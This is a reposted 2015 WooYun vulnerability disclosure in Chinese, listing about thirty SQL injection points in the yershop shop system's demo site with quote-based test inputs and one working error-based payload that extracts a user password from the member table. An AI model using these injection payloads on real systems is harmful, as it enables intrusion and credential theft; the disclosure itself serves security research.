文档章节

yershop商城系统30处sql注入

simpower
 simpower
发布于 2015/11/28 16:07
字数 562
阅读 465
收藏 0

漏洞详情

披露状态:

2015-08-10: 细节已通知厂商并且等待厂商处理中
2015-08-15: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2015-10-09: 细节向核心白帽子及相关领域专家公开
2015-10-19: 细节向普通白帽子公开
2015-10-29: 细节向实习白帽子公开
2015-11-13: 细节向公众公开

简要描述:

有回显,非盲,无视gpc,tp框架,安装环境php5.3以上,官网demo演示

详细说明:

http://demo.yershop.com/index.php?s=/Home/account/savepaykey.html

post:uid=1'



http://demo.yershop.com/index.php?s=/home/article/comment

post:goodid=1'





http://demo.yershop.com/index.php?s=/home/article/commentgood

post:goodid=1'





http://demo.yershop.com/index.php?s=/home/article/commentmiddle

post:goodid=1'



http://demo.yershop.com/index.php?s=/home/article/commentworse

post:goodid=1'



http://demo.yershop.com/index.php?s=/Home/center/shezhi //下面的需要登录

post:id=1'



http://demo.yershop.com/index.php?s=/Home/center/deleteAddress.html

post:id=1'





http://demo.yershop.com/index.php?s=/home/order/detail/id/1'





http://demo.yershop.com/index.php?s=/home/order/cancel/id/1'





http://demo.yershop.com/index.php?s=/home/order/canceldetail/id/1'





http://demo.yershop.com/index.php?s=/home/order/backdetail/id/1'





http://demo.yershop.com/index.php?s=/home/order/changedetail/id/1'





http://demo.yershop.com/index.php?s=/home/order/wuliu/orderid/1



http://demo.yershop.com/index.php?s=/home/order/back/

post:id=1'



http://demo.yershop.com/index.php?s=/home/order/backkuaidi/

post:backid=1'



http://demo.yershop.com/index.php?s=/home/order/change/

post:id=1'



http://demo.yershop.com/index.php?s=/home/order/changekuaidi/

post:backid=1'





http://demo.yershop.com/index.php?s=/home/order/complete/id/1'



http://demo.yershop.com/index.php?s=/home/pay/index/orderid/1'



http://demo.yershop.com/index.php?s=/home/pay/chongzhi/orderid/1'



http://demo.yershop.com/index.php?s=/home/service/index/id/1'



http://demo.yershop.com/index.php?s=/home/shopcart/addItem/

post:id=1'&i=1'



http://demo.yershop.com/index.php?s=/home/shopcart/addgood/

post:id=1'



http://demo.yershop.com/index.php?s=/home/shopcart/createorder/

post:tag=1'



http://demo.yershop.com/index.php?s=/home/shopcart/delItemByuid/

post:sort=1'



http://demo.yershop.com/index.php?s=/home/shopcart/getPricetotal/tag/1'



http://demo.yershop.com/index.php?s=/home/shopcart/getpriceNum/id/1'



http://demo.yershop.com/index.php?s=/home/user/checkcode/

post:couponid=1'



http://demo.yershop.com/index.php?s=/home/user/getcoupon/

post:couponid=1'



http://demo.yershop.com/index.php?s=/home/user/cut/id/1'



下面给出一个payload:

http://demo.yershop.com/index.php?s=/home/article/comment

goodid=1') and extractvalue(1, concat(0x5c, (select a.password from (select tmp.* from yershop_ucenter_member tmp limit 1)a) ) )%23

漏洞证明:

QQ截图20150808195211.jpg

修复方案:

给我小礼物我就告诉你们,保证给力!

版权声明:转载请注明来源 不能忍@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-11-13 10:59

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无

本文转载自:http://www.wooyun.org/bugs/wooyun-2015-0132734

simpower
粉丝 28
博文 669
码字总数 50544
作品 0
海淀
程序员
私信 提问
Ecmos商城系统维护更新!

Ecmos商城系统(多用户系统、当前版本0.00.012支持在线升级)是基于ecmall进行深度定制的系统,由360cd.cn主导定制开发。融入多款实用新功能,底层代码深度优化。 商城功能:合并订单,合并购...

liutong0715
2016/12/06
585
2
wemall3.4更新 升级tp3.2.3内核

WeMall 是一款基于thinkphp 3.2进行开发的微信O2O开源商城系统 ,是一款能够帮助企业及个人快速构建O2O(线上到线下)服务体系的系统 ,适用于小企业电子商务,例如微信水果,微信蔬菜,微信...

einsqing
2016/03/17
42
0
基于 yaf 框架的php商城系统 - ChuanHaiShop

ChuanHaiShop 采用php的yaf内存框架开发,运行速度极快,自身集成orm,使用灵活,sql语句的执行采用sql预处理方式,从根源上避免了sql注入,业务逻辑大量采用行锁,事务,运行稳定。 1.数据库...

战神001
2017/08/24
2.1K
0
WeMall 3.4 更新,升级tp内核

WeMall 3.4 更新了。WeMall 是一款基于thinkphp 3.2 进行开发的微信O2O开源商城系统 ,是一款能够帮助企业及个人快速构建O2O(线上到线下)服务体系的系统 ,适用于小企业电子商务,例如微信...

einsqing
2016/03/17
2.8K
10
water176142735/ECMOS

ECMOS安装 ###使用install安装 执行路径http://you web site/install 一路安装下去就可以 2017-04-21 修复了SL()类的调用BUG; 2017-4-5 更新日志 增加了系统提示的屏蔽。隐藏使用信息。 修改...

water176142735
2016/08/16
0
0

没有更多内容

加载失败,请刷新页面

加载更多

3_数组

3_数组

行者终成事
今天
7
0
经典系统设计面试题解析:如何设计TinyURL(二)

原文链接:https://www.educative.io/courses/grokking-the-system-design-interview/m2ygV4E81AR 编者注:本文以一道经典的系统设计面试题:《如何设计TinyURL》的参考答案和解析为例,帮助...

APEMESH
今天
7
0
使用logstash同步MySQL数据到ES

概述   在生成业务常有将MySQL数据同步到ES的需求,如果需要很高的定制化,往往需要开发同步程序用于处理数据。但没有特殊业务需求,官方提供的logstash就很有优势了。   在使用logstas...

zxiaofan666
今天
10
0
X-MSG-IM-分布式信令跟踪能力

经过一周多的鏖战, X-MSG-IM的分布式信令跟踪能力已基本具备, 特点是: 实时. 只有要RX/TX就会实时产生信令跟踪事件, 先入kafka, 再入influxdb待查. 同时提供实时sub/pub接口. 完备. 可以完整...

dev5
今天
7
0
OpenJDK之CyclicBarrier

OpenJDK8,本人看的是openJDK。以前就看过,只是经常忘记,所以记录下 图1 CyclicBarrier是Doug Lea在JDK1.5中引入的,作用就不详细描述了,主要有如下俩个方法使用: await()方法,如果当前线...

克虏伯
今天
8
0

没有更多内容

加载失败,请刷新页面

加载更多

返回顶部
顶部